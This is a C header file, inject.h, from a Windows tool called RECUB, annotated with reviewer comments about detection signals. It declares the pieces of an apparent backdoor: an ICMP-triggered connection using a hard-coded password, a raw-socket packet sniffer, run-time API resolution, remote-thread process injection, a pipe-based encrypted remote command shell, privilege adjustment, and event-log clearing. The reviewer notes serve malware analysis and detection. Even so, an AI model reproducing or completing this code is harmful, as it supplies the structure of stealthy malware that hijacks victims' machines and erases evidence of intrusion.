📄 inject.h
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// //
// RECUB //
// By Hirosh //
// www.hirosh.net //
// www.eos-india.net //
// //
//Thanks to starch at http://mir-os.sourceforge.net for the idea. I started this by //
//porting his Linux version to Win32; after some time I stopped porting because I prefer //
//a small EXE heheh.., and thanks to the NC source too.. //
// //
// No CopyRights - Feel Free to Cut & Paste //
// //
// //
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// Winsock 2 declarations (SOCKET, WSAIoctl, sockaddr, hostent, ...).
#include <winsock2.h>
// NOTE(review): defined after <winsock2.h>, so it can only affect headers
// included from this point on (<wincrypt.h>). 0x0510 is not one of the
// documented version values (0x0500, 0x0501, ...), so the intended target
// Windows version cannot be read off this line.
#define _WIN32_WINNT 0x0510
// CryptoAPI types used by the typedefs below (HCRYPTPROV, HCRYPTKEY,
// HCRYPTHASH, ALG_ID).
#include <wincrypt.h>
// Hard-coded shared secret. As a string literal it is compiled into every
// build unchanged, so it is recoverable with a plain strings scan. Three
// characters plus the terminator exactly fill XData.pass[4]. How it is
// compared is not visible in this header.
#define SERVER_PASS "123"
// Control code for WSAIoctl that puts a raw socket into receive-all mode (same
// value as SIO_RCVALL in <mstcpip.h>). Receive-all needs administrator rights,
// so a process that is not a known capture tool issuing this ioctl is a
// useful behavioural signal.
#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)
// Fixed-layout record: one-byte start/end markers around a password, an
// address string and a port.
// NOTE(review): presumably overlaid on or copied from received packet data -
// confirm in the code that fills it. With default alignment the compiler pads
// three bytes between ip[16] (ending at offset 21) and port, so the in-memory
// layout only matches a byte stream produced by the same compiler settings.
typedef struct tagXData
{
char start;          // leading marker byte; expected value not defined in this header
char pass[4];        // room for 3 characters + NUL (the length of SERVER_PASS); no slack
char ip[16];         // room for a dotted-quad IPv4 string ("255.255.255.255" + NUL); no slack
unsigned int port;   // port number; byte order not stated here
char end;            // trailing marker byte; expected value not defined in this header
} XData;
// Fixed 20-byte part of an IPv4 header (RFC 791 field order). Multi-byte
// fields are in network byte order when this struct is overlaid on captured
// packet bytes. IP options, if present, follow this struct, so the payload
// offset has to be taken from the low nibble of ip_verlen, not assumed to be
// sizeof(IP_HDR).
typedef struct ip_hdr
{
unsigned char ip_verlen;        // version (high 4 bits) and header length in 32-bit words (low 4 bits)
unsigned char ip_tos;           // type of service
unsigned short ip_totallength;  // total datagram length, header included
unsigned short ip_id;           // identification
unsigned short ip_offset;       // flags and fragment offset
unsigned char ip_ttl;           // time to live
unsigned char ip_protocol;      // payload protocol number (1 = ICMP)
unsigned short ip_checksum;     // header checksum
unsigned int ip_srcaddr;        // source IPv4 address
unsigned int ip_destaddr;       // destination IPv4 address
} IP_HDR;
// Number of payload bytes carried after the ICMP header in ECHOREQUEST.
#define REQ_DATASIZE 32
// 8-byte ICMP header in the form used by echo request/reply messages.
typedef struct tagICMPHDR
{
unsigned char icmp_type;    // ICMP message type
unsigned char icmp_code;    // ICMP message code
unsigned short icmp_cksum;  // ICMP checksum
unsigned short icmp_id;     // echo identifier
unsigned short icmp_seq;    // echo sequence number
} ICMPHDR, *PICMPHDR;
// ICMP header followed by a fixed REQ_DATASIZE-byte data area.
// NOTE(review): a received packet may carry fewer payload bytes than
// REQ_DATASIZE; whether the reader checks the received length before touching
// cData is not visible in this header.
typedef struct tagECHOREQUEST
{
ICMPHDR icmpHdr;
char cData[REQ_DATASIZE];
} ECHOREQUEST, *PECHOREQUEST;
// Function-pointer types for Windows APIs that are called through pointers.
// The parameter structs later in this header carry tLoadLibrary and
// tGetProcAddress pointers together with name buffers, so these APIs are
// presumably resolved at run time rather than imported - confirm in the .c
// files. APIs resolved that way do not appear in the PE import table, so
// triage of a built sample has to rely on strings and behaviour, not on the
// import listing.
//typedef HANDLE (WINAPI *tCreateFile)( LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile );
//typedef BOOL (WINAPI *tWriteFile)( HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped );
//typedef DWORD (WINAPI *tSetFilePointer) ( HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod );
// Winsock: address conversion, startup, socket lifecycle, ioctl and I/O.
typedef char FAR * (WINAPI *tinet_ntoa) ( struct in_addr in );
//typedef int (WINAPI *tMBox)(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType);
typedef int (WINAPI *tWSAStartup)( WORD wVersionRequested, LPWSADATA lpWSAData );
// NOTE(review): the next five types declare the socket handle (and the return
// value of socket/accept) as int, while the types further down use SOCKET.
// The two only have the same size on 32-bit Windows, which suggests the code
// was written for 32-bit builds only.
typedef int (WINAPI *tsocket)( int , int type, int protocol );
typedef int (WINAPI *tbind)( int , const struct sockaddr FAR *name, int namelen);
typedef int (WINAPI *tlisten)( int , int backlog);
typedef int (WINAPI *taccept)( int ,struct sockaddr FAR *addr,int FAR *addrlen);
typedef int (WINAPI *tclosesocket)(int);
typedef int (WINAPI *tWSAIoctl)(SOCKET s,DWORD dwIoControlCode,LPVOID lpvInBuffer,DWORD cbInBuffer,LPVOID lpvOutBuffer,DWORD cbOutBuffer,LPDWORD lpcbBytesReturned,LPWSAOVERLAPPED lpOverlapped,LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);
typedef int (WINAPI *trecv)(SOCKET s,char FAR *buf,int len, int flags);
typedef struct hostent FAR *(WINAPI *tgethostbyname)( const char FAR *name);
typedef int (WINAPI *tconnect)(SOCKET s,const struct sockaddr FAR *name,int namelen);
typedef u_short (WINAPI *thtons)(u_short hostshort);
typedef int (WINAPI *tsend)( SOCKET s, const char FAR *buf, int len, int flags);
typedef unsigned long (WINAPI *tinet_addr)( const char FAR *cp);
//typedef VOID (WINAPI *tZeroMemory)(PVOID Destination,SIZE_T Length);
// Thread creation and sleeping in the current process.
typedef HANDLE (WINAPI *tCreateThread)( LPSECURITY_ATTRIBUTES lpThreadAttributes, DWORD dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId );
typedef VOID (WINAPI *tSleep)( DWORD dwMilliseconds);
// Cross-process APIs: open another process, allocate memory in it, write to
// that memory and start a thread there. Seen together in one process, this is
// the API set that behavioural detections associate with remote-thread code
// injection.
typedef HANDLE (WINAPI *tCreateRemoteThread)(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, DWORD dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
// NOTE(review): nSize and the byte-count output are DWORD-based here, whereas
// tVirtualAllocEx below uses SIZE_T; the two agree only on 32-bit builds.
typedef BOOL (WINAPI *tWriteProcessMemory)( HANDLE hProcess, LPVOID lpBaseAddress, LPVOID lpBuffer, DWORD nSize, LPDWORD lpNumberOfBytesWritten);
typedef LPVOID (WINAPI *tVirtualAllocEx)( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
typedef HANDLE (WINAPI *tOpenProcess)( DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
// Library loading and symbol lookup.
// NOTE(review): tLoadLibrary takes LPCTSTR, so its character width depends on
// whether UNICODE is defined at build time.
typedef HMODULE (WINAPI *tLoadLibrary)( LPCTSTR lpFileName );
typedef FARPROC (WINAPI *tGetProcAddress)( HMODULE hModule,LPCSTR lpProcName);
typedef BOOL (WINAPI *tFreeLibrary)( HMODULE hModule);
//DoExec
// Function-pointer types for process creation, pipes, handle duplication,
// waiting and teardown. The "DoExec" label is the author's; the routine it
// refers to is not part of this header. A process that creates anonymous
// pipes and a child process while also holding a network socket is a common
// behavioural signal for a remote shell.
typedef BOOL (WINAPI *tCreatePipe)( PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize );
typedef BOOL (WINAPI *tDuplicateHandle)( HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions);
typedef BOOL (WINAPI *tCreateProcess)(LPCTSTR lpApplicationName,LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment,LPCTSTR lpCurrentDirectory,LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
typedef DWORD (WINAPI *tWaitForMultipleObjects)( DWORD nCount,CONST HANDLE *lpHandles,BOOL fWaitAll, DWORD dwMilliseconds);
typedef BOOL (WINAPI *tCloseHandle)( HANDLE hObject);
typedef BOOL (WINAPI *tTerminateThread)(HANDLE hThread,DWORD dwExitCode);
typedef BOOL (WINAPI *tTerminateProcess)(HANDLE hProcess,UINT uExitCode);
typedef BOOL (WINAPI *tDisconnectNamedPipe)(HANDLE hNamedPipe);
// Pipe polling and reading.
typedef BOOL (WINAPI *tPeekNamedPipe)(HANDLE hNamedPipe,LPVOID lpBuffer,DWORD nBufferSize,LPDWORD lpBytesRead,LPDWORD lpTotalBytesAvail,LPDWORD lpBytesLeftThisMessage);
typedef BOOL (WINAPI *tReadFile)( HANDLE hFile,LPVOID lpBuffer,DWORD nNumberOfBytesToRead,LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
typedef VOID (WINAPI *tExitThread)( DWORD dwExitCode);
// String helpers from kernel32. They are declared with LPTSTR/LPCTSTR, so
// their character width follows the UNICODE build setting. lstrcpy performs
// no bounds check on the destination.
typedef LPTSTR (WINAPI *tlstrcpy)( LPTSTR lpString1,LPCTSTR lpString2);
//typedef int (WINAPI *tlstrcmpi)(LPCTSTR lpString1, LPCTSTR lpString2);
typedef int (WINAPI *tlstrlen)(LPCTSTR lpString);
typedef int (WINAPI *tlstrcmp)( LPCTSTR lpString1, LPCTSTR lpString2 );
typedef BOOL (WINAPI *tWriteFile)(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
typedef HANDLE (WINAPI *tGetCurrentProcess)(VOID);
//typedef VOID (WINAPI *tPostQuitMessage)( int nExitCode );
//typedef DWORD (WINAPI *tFormatMessage)( DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPTSTR lpBuffer, DWORD nSize, va_list *Arguments );
//typedef DWORD (WINAPI *tGetLastError)(VOID);
//Crypt
// CryptoAPI function-pointer types: acquire a provider, create a hash and
// feed it data, derive a key from that hash, encrypt/decrypt, then destroy
// the key and hash and release the provider. The algorithm identifiers and
// the data that is hashed are chosen by the callers, which are not part of
// this header.
typedef BOOL (WINAPI *tCryptAcquireContext)( HCRYPTPROV *phProv, LPCTSTR pszContainer, LPCTSTR pszProvider, DWORD dwProvType, DWORD dwFlags);
typedef BOOL (WINAPI *tCryptCreateHash)( HCRYPTPROV hProv, ALG_ID Algid,HCRYPTKEY hKey,DWORD dwFlags,HCRYPTHASH *phHash);
typedef BOOL (WINAPI *tCryptHashData)( HCRYPTHASH hHash, BYTE *pbData, DWORD dwDataLen, DWORD dwFlags);
typedef BOOL (WINAPI *tCryptDeriveKey)( HCRYPTPROV hProv, ALG_ID Algid, HCRYPTHASH hBaseData, DWORD dwFlags, HCRYPTKEY *phKey);
typedef BOOL (WINAPI *tCryptDecrypt)( HCRYPTKEY hKey, HCRYPTHASH hHash,BOOL Final, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen);
typedef BOOL (WINAPI *tCryptDestroyKey)( HCRYPTKEY hKey);
typedef BOOL (WINAPI *tCryptDestroyHash)( HCRYPTHASH hHash);
typedef BOOL (WINAPI *tCryptReleaseContext)( HCRYPTPROV hProv, DWORD dwFlags);
// CryptEncrypt works in place and takes the buffer capacity (dwBufLen)
// separately from the data length, because ciphertext can be longer than the
// plaintext.
typedef BOOL (WINAPI *tCryptEncrypt)( HCRYPTKEY hKey, HCRYPTHASH hHash, BOOL Final, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen, DWORD dwBufLen);
// Access-token APIs: open the process token, look up a privilege LUID and
// adjust the token's privileges. Which privilege is requested is not visible
// in this header.
typedef BOOL (WINAPI *tOpenProcessToken)( HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
typedef BOOL (WINAPI *tLookupPrivilegeValue)( LPCTSTR lpSystemName, LPCTSTR lpName, PLUID lpLuid);
typedef BOOL (WINAPI *tAdjustTokenPrivileges)( HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
// Event-log APIs. ClearEventLog empties a Windows event log. On current
// Windows versions the clear is itself recorded (event ID 1102 for the
// Security log, 104 for other logs), and forwarding logs off-host preserves
// what a local clear removes.
typedef HANDLE (WINAPI *tRegisterEventSource)( LPCTSTR lpUNCServerName, LPCTSTR lpSourceName );
typedef BOOL (WINAPI *tClearEventLog)( HANDLE hEventLog,LPCTSTR lpBackupFileName);
typedef BOOL (WINAPI *tDeregisterEventSource)( HANDLE hEventLog);
typedef VOID (WINAPI *tExitProcess)( UINT uExitCode );
// Per-session handles: two pipe ends, one process, one socket and two threads.
// The struct is referenced through a pointer from WriteShellTParam and
// ReadShellTParam. Which end of which pipe each handle is, and who closes
// them, is decided in code that is not part of this header.
typedef struct TSESSION_DATA{
HANDLE ReadPipeHandle;           // pipe handle used for reading
HANDLE WritePipeHandle;          // pipe handle used for writing
HANDLE ProcessHandle;            // process handle; presumably the child created via tCreateProcess - confirm
SOCKET ClientSocket;             // network socket for this session
HANDLE ReadShellThreadHandle;    // thread handle; presumably the tISessionReadShellThread worker - confirm
HANDLE WriteShellThreadHandle;   // thread handle; presumably the tISessionWriteShellThread worker - confirm
} SESSION_DATA;
// Parameter block for the routine typed as tISessionWriteShellThread.
// It bundles function pointers, module handles, name strings, CryptoAPI state
// and a data buffer, so the routine receives everything through one pointer.
// The field set (precv, pWriteFile, pCryptDecrypt) suggests a
// socket -> decrypt -> pipe direction - confirm in the routine itself.
// The sz* arrays have room for one DLL or export name plus terminator and no
// slack; the strings are assigned elsewhere. The crypto name buffers fit the
// ANSI export names (e.g. 21 bytes holds "CryptAcquireContextA").
typedef struct TWriteShellTParam
{
// Loader entry points.
tLoadLibrary pLoadLibrary;
tGetProcAddress pGetProcAddress;
tFreeLibrary pFreeLibrary;
// tMBox pMBox;
// tlstrcmpi plstrcmpi;
// API pointers stored in this block.
tExitThread pExitThread;
tWriteFile pWriteFile;
trecv precv;
// Module handles (kernel32 and Winsock, going by the names).
HMODULE hk32,hwinsock;
// HMODULE husr32;
// char szuser32dll[11];
// DLL and export names.
char szWs232[11];
char szkernel32dll[13];
// char szMessageBoxA[12];
char szrecv[5];
char szWriteFile[10];
char szExitThread[11];
// char szlstrcmpi[9];
// Flag, presumably selecting whether the CryptoAPI state below is used - confirm.
BOOL Encrypt;
// Decryption state and CryptoAPI pointers.
HMODULE hAdvapi;
HCRYPTPROV hProv;
HCRYPTKEY hKey;
HCRYPTKEY hXchgKey;
HCRYPTHASH hHash;
DWORD dwLength;
// Password text kept in this block in clear; presumably the input to
// CryptHashData/CryptDeriveKey - confirm.
char szLocalPassword[100];
// Provider name; presumably passed to CryptAcquireContext - confirm.
char CSP[50];
tCryptAcquireContext pCryptAcquireContext;
tCryptCreateHash pCryptCreateHash;
tCryptHashData pCryptHashData;
tCryptDeriveKey pCryptDeriveKey;
tCryptDecrypt pCryptDecrypt;
tCryptDestroyKey pCryptDestroyKey;
tCryptDestroyHash pCryptDestroyHash;
tCryptReleaseContext pCryptReleaseContext;
tlstrlen plstrlen;
tCloseHandle pCloseHandle;
char szAdvapi32[13];
char szlstrlen[9];
char szCryptAcquireContext[21];
char szCryptCreateHash[16];
char szCryptHashData[14];
char szCryptDeriveKey[15];
char szCryptDecrypt[13];
char szCryptDestroyKey[16];
char szCryptDestroyHash[17];
char szCryptReleaseContext[20];
// End of decryption state.
// Session pointer and working buffer.
SESSION_DATA *Session;
// NOTE(review): 100-byte buffer; whether the receive length is limited to
// sizeof Buff is not visible in this header.
BYTE Buff[100];
DWORD BytesWritten;
DWORD RcvCnt;
}WriteShellTParam;
// Parameter block for the routine typed as tISessionReadShellThread.
// It mirrors WriteShellTParam: function pointers, module handles, name
// strings, CryptoAPI state and a data buffer, all reached through one pointer.
// The field set (pPeekNamedPipe, pReadFile, pCryptEncrypt, psend) suggests a
// pipe -> encrypt -> socket direction - confirm in the routine itself.
// The sz* arrays have room for one DLL or export name plus terminator and no
// slack; the strings are assigned elsewhere.
typedef struct TReadShellTParam
{
// Loader entry points.
tLoadLibrary pLoadLibrary;
tGetProcAddress pGetProcAddress;
tFreeLibrary pFreeLibrary;
// tMBox pMBox;
// API pointers stored in this block.
tPeekNamedPipe pPeekNamedPipe;
tReadFile pReadFile;
tSleep pSleep;
tsend psend;
tExitThread pExitThread;
// Module handles (kernel32 and Winsock, going by the names).
HMODULE hk32,hwinsock;
// HMODULE husr32;
// char szuser32dll[11];
// DLL and export names.
char szWs232[11];
char szkernel32dll[13];
// char szMessageBoxA[12];
char szPeekNamedPipe[14];
char szSleep[6];
char szReadFile[9];
char szExitThread[11];
char szsend[5];
// Encryption state and CryptoAPI pointers. This struct holds pCryptEncrypt
// where WriteShellTParam holds pCryptDecrypt.
// Flag, presumably selecting whether the CryptoAPI state below is used - confirm.
BOOL Encrypt;
HMODULE hAdvapi;
HCRYPTPROV hProv;
HCRYPTKEY hKey;
HCRYPTKEY hXchgKey;
HCRYPTHASH hHash;
DWORD dwLength;
// Password text kept in this block in clear; presumably the input to
// CryptHashData/CryptDeriveKey - confirm.
char szLocalPassword[100];
// Provider name; presumably passed to CryptAcquireContext - confirm.
char CSP[50];
tCryptAcquireContext pCryptAcquireContext;
tCryptCreateHash pCryptCreateHash;
tCryptHashData pCryptHashData;
tCryptDeriveKey pCryptDeriveKey;
tCryptEncrypt pCryptEncrypt;
tCryptDestroyKey pCryptDestroyKey;
tCryptDestroyHash pCryptDestroyHash;
tCryptReleaseContext pCryptReleaseContext;
tlstrlen plstrlen;
tCloseHandle pCloseHandle;
char szAdvapi32[13];
char szlstrlen[9];
char szCryptAcquireContext[21];
char szCryptCreateHash[16];
char szCryptHashData[14];
char szCryptDeriveKey[15];
char szCryptEncrypt[13];
char szCryptDestroyKey[16];
char szCryptDestroyHash[17];
char szCryptReleaseContext[20];
// End of encryption state.
// Session pointer and working buffer.
SESSION_DATA *Session;
// NOTE(review): 1000-byte buffer. CryptEncrypt output can be longer than its
// input, so whether a read that fills Buff leaves room for the ciphertext
// depends on the cipher and read size, neither of which is visible here.
BYTE Buff[1000];
DWORD BytesRead;
} ReadShellTParam;
// Entry-point types for the two session worker routines. Each takes a pointer
// to its parameter block and returns a DWORD.
// NOTE(review): the parameter is a typed struct pointer, not LPVOID, so these
// types differ from LPTHREAD_START_ROUTINE as used by tCreateThread and
// tCreateRemoteThread above; passing one where the other is expected needs a
// cast.
typedef DWORD (WINAPI *tISessionWriteShellThread)(WriteShellTParam *sp);
typedef DWORD (WINAPI *tISessionReadShellThread)(ReadShellTParam *sp);
typedef struct TConnectParam
{
tLoadLibrary pLoadLibrary;
tGetProcAddress pGetProcAddress;
tFreeLibrary pFreeLibrary;
tCreateThread pCreateThread;
// tMBox pMBox;
tWSAStartup pWSAStartup;
tsocket psocket;
tgethostbyname pgethostbyname;
tconnect pconnect;
thtons phtons;
tinet_addr pinet_addr;
//for cmd
tCreatePipe pCreatePipe;
tDuplicateHandle pDuplicateHandle;
tGetCurrentProcess pGetCurrentProcess;
tCreateProcess pCreateProcess;
tCloseHandle pCloseHandle;
tclosesocket pclosesocket;
tDisconnectNamedPipe pDisconnectNamedPipe;
tWaitForMultipleObjects pWaitForMultipleObjects;
tTerminateThread pTerminateThread;
tTerminateProcess pTerminateProcess;
tISessionWriteShellThread pISessionWriteShellThread;
tISessionReadShellThread pISessionReadShellThread;
// tPostQuitMessage pPostQuitMessage;
tRegisterEventSource pRegisterEventSource;
tClearEventLog pClearEventLog;